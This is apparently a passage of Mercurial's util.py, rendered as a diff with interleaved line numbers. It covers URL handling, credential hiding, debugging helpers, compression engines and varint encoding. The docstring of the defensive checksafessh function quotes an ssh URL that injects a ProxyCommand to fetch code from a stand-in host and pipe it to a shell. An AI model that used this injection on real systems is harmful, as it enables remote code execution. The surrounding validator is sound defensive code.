                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                # rsplit so user names may themselves contain '@'.
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        # Only components that were actually parsed (non-None) are shown.
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # Bracketed IPv6 literals are emitted verbatim.
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        '''Return (url, authinfo) where url omits any credentials and
        authinfo is None when there is no user, or otherwise the 4-tuple
        handed to urllib2's password manager.'''
        user, passwd = self.user, self.passwd
        try:
            # Temporarily strip credentials so bytes(self) omits them.
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        '''whether this URL/path is absolute, i.e. cannot be joined
        onto a base path'''
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        # file: and bundle: URLs map to a local filesystem path; any
        # other scheme falls back to the original, unparsed string.
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3056
3065
def hasscheme(path):
    """Report whether path carries a URL scheme prefix."""
    u = url(path)
    return bool(u.scheme)
3059
3068
3060 def hasdriveletter(path):
3069 def hasdriveletter(path):
3061 return path and path[1:2] == ':' and path[0:1].isalpha()
3070 return path and path[1:2] == ':' and path[0:1].isalpha()
3062
3071
def urllocalpath(path):
    """Return the local filesystem path for a URL-ish path string."""
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
3065
3074
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    decoded = urlreq.unquote(path)
    # A host starting with '-' would be parsed by ssh as an option (SEC).
    if decoded.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (decoded,))
3080
3089
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3087
3096
def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    # Return bytes, not str: on Python 3 str(u) would yield unicode while
    # the sibling hidepassword() (and all callers of these helpers)
    # operate on bytes url strings.
    return bytes(u)
3093
3102
# Human-readable formatter for elapsed times given in (float) seconds,
# built on unitcountfn() (defined earlier in this file). The rows run
# from whole seconds down to nanoseconds so the coarsest applicable
# unit is used with 0-3 decimal places of precision.
# NOTE(review): the exact meaning of each (factor, divisor, format)
# triple is defined by unitcountfn -- confirm against its implementation.
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3109
3118
# Current nesting depth of @timed calls; a one-element list so nested
# wrapper invocations can mutate it in place.
_timenesting = [0]

def timed(func):
    '''Decorator reporting a function call's execution time to stderr.

    Meant for use during development when measuring the cost of a
    function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        indent = 2
        start = timer()
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            # Indent by the remaining nesting depth so nested timings
            # line up under their callers.
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper
3136
3145
# Suffix multipliers for sizetoint(). Order matters: single-letter
# forms are tried before the two-letter forms, bare 'b' last.
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3158
3167
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs; kept unsorted until call time
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # Sort in place so the ordering is stable across calls.
        self._hooks.sort(key=lambda pair: pair[0])
        return [hookfn(*args) for _source, hookfn in self._hooks]
3176
3185
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.

    Skips the 'skip' last entries, then returns the last 'depth' entries
    (depth=0 keeps everything that remains). Each file+linenumber is
    formatted according to fileline; each yielded line according to line.
    If line is None, tuples of
        (length of longest filepath+line number,
         filepath+linenumber,
         function)
    are yielded instead.

    Not to be used in production code but very convenient while
    developing.
    '''
    frames = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, ln, func, _text in frames:
        fnln = fileline % (pycompat.sysbytes(fn), ln)
        entries.append((fnln, pycompat.sysbytes(func)))
    entries = entries[-depth:]
    if not entries:
        return
    fnmax = max(len(fnln) for fnln, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3199
3208
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # Flush the other stream first so interleaved output stays ordered
        # when both streams point at the same terminal.
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 also hides this helper's own frame from the trace.
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3214
3223
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # Maps directory name -> number of tracked paths beneath it.
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # dirstate-style mapping: each value's first element is the
            # entry state; paths whose state equals ``skip`` are excluded.
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # Shallower ancestors were counted when ``base`` was first
                # added, so bumping the first known ancestor suffices.
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # Ancestors are still referenced by other paths and keep
                # their (already correct) counts; stop after decrementing.
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3250
3259
# Prefer the C implementation of ``dirs`` when the parsers extension
# module provides one; it is a drop-in replacement for the Python class.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3253
3262
def finddirs(path):
    '''Yield each ancestor directory of ``path``, deepest first.'''
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        # Continue searching strictly before the separator just found.
        pos = path.rfind('/', 0, pos)
3259
3268
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes a compression engine's wire protocol support: the protocol
# name plus advertisement priorities for each side of the connection.
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3268
3277
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name -> engine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        # Same availability contract as forbundlename()/forbundletype().
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
3422
3431
# Global registry all compression engines register themselves against.
compengines = compressormanager()
3424
3433
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        # Engines are assumed present unless a subclass says otherwise.
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3541
3550
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    # Feed back any input zlib did not consume yet.
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small to plausibly compress below the input size.
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2 ** 20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()
3626
3635
# zlib is always importable, so this engine is unconditionally available.
compengines.register(_zlibengine())
3628
3637
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            # BZ2Compressor buffers internally; skip empty intermediate
            # results rather than yielding them.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())
3669
3678
# bz2 ships with the standard library, so this engine is always available.
compengines.register(_bz2engine())
3671
3680
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing name: this format is only produced/consumed
        # internally for legacy bundles with the 'BZ' magic stripped.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())
3690
3699
# Register the headerless-bzip2 engine with the global engine registry.
compengines.register(_truncatedbz2engine())
3692
3701
class _noopengine(compressionengine):
    """Pass-through engine that performs no compression at all."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Nothing to do: hand the chunk iterator straight back.
        return it

    def decompressorreader(self, fh):
        # Likewise, reads come straight from the underlying file object.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # None tells the revlog to store the data uncompressed.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()
3725
3734
# Register the no-op (uncompressed) engine with the global registry.
compengines.register(_noopengine())
3727
3736
class _zstdengine(compressionengine):
    # Engine backed by the optional zstd module (vendored as
    # ``mercurial.zstd``). All entry points must tolerate the module
    # being absent; ``available()`` reports whether it imported cleanly.
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        # Compress an iterable of chunks, yielding compressed output chunks.
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        # Wrap ``fh`` in a buffered reader of decompressed data.
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            # Chunk sizes recommended by the zstd module for streaming
            # (de)compression.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            # Return compressed ``data``, or None when storing it
            # uncompressed is at least as good.
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to be worthwhile.
                return None

            elif insize <= 1000000:
                # One-shot compression for small-ish inputs; keep the
                # result only if it actually saved space.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream larger inputs through the compressor in
                # recommended-size pieces to bound memory use.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                # Normalize any zstd failure into RevlogError so revlog
                # callers see a consistent exception type.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))
3854
3863
# Register the zstd engine with the global engine registry. It reports
# itself unavailable when the zstd module cannot be imported.
compengines.register(_zstdengine())
3856
3865
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    items = {}
    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        value = docobject()
        value.__doc__ = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items
3888
3897
# Expose the formatted bundletype doc objects at module level —
# presumably so the i18n machinery picks their docstrings up for
# translation (TODO confirm against the i18n extraction tooling).
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3893
3902
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    taken = others if others is not None else set()

    def isfree(name):
        return name not in ctx and name not in taken

    # Try the bare "name~tag" form first, then append increasing numeric
    # suffixes until an unused name is found.
    candidate = '%s~%s' % (f, tag)
    if isfree(candidate):
        return candidate
    for suffix in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, suffix)
        if isfree(candidate):
            return candidate
3916
3925
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    data = stream.read(n)
    # read(n) returns at most n bytes, so >= n means exactly n.
    if len(data) >= n:
        return data
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (len(data), n))
3925
3934
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    # Emit 7 bits per byte, least significant group first; every byte
    # except the last carries the 0x80 continuation bit.
    groups = []
    remaining = value
    while True:
        lowbits = remaining & 0x7f
        remaining >>= 7
        if remaining:
            groups.append(pycompat.bytechr(0x80 | lowbits))
        else:
            groups.append(pycompat.bytechr(lowbits))
            break

    return ''.join(groups)
3962
3971
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
